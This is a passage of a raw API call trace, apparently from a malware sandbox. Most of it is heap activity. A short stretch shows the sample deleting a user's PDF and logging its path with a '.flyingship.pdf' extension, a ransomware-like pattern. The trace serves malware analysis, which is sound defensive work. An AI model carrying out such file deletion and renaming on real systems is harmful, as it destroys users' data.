lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.543] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.544] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.544] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0173.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0173.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0173.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0173.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.545] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.545] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\xjtjup63.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0173.546] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.546] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.546] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.546] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.546] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0173.546] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.546] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.546] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.548] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.548] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.548] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.548] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.548] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.548] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0173.548] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.548] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.548] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.549] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.549] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.549] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.549] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.549] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf", lpFilePart=0x0) returned 0x44 [0173.551] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaf22dc0, ftCreationTime.dwHighDateTime=0x1d5e632, ftLastAccessTime.dwLowDateTime=0x179d67e0, ftLastAccessTime.dwHighDateTime=0x1d5debb, ftLastWriteTime.dwLowDateTime=0xcccc820, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xea9a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="XjtJup63.pdf", cAlternateFileName="")) returned 0x90af58 [0173.552] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\xjtjup63.pdf")) returned 1 [0173.554] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaf22dc0, ftCreationTime.dwHighDateTime=0x1d5e632, ftLastAccessTime.dwLowDateTime=0x179d67e0, ftLastAccessTime.dwHighDateTime=0x1d5debb, ftLastWriteTime.dwLowDateTime=0xcccc820, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xea9a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="XjtJup63.pdf", cAlternateFileName="")) returned 0 [0173.555] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0173.555] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.555] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.555] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0173.555] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.556] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.556] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.556] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.556] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0173.556] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.557] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.557] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0173.557] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.557] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0173.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0173.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0173.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.559] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0173.559] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x12ca, lpOverlapped=0x0) returned 1 [0173.559] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0173.559] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x12ca, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.559] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0173.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0173.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0173.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.flyingship.pdf\r\n", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0173.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x52) returned 0x8c4a48 [0173.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.flyingship.pdf\r\n", cchWideChar=82, lpMultiByteStr=0x8c4a48, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.flyingship.pdf\r\n", lpUsedDefaultChar=0x0) returned 82 [0173.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0173.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0173.560] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x51, lpOverlapped=0x0) returned 1 [0173.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0173.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.560] CloseHandle (hObject=0x120) returned 1 [0173.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0173.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0173.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0173.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0173.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0173.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0173.563] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0173.563] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0173.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0173.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0173.565] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0173.565] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.565] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0173.565] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0173.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0173.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0173.565] RtlAllocateHeap (HeapHandle=0x8a0000, 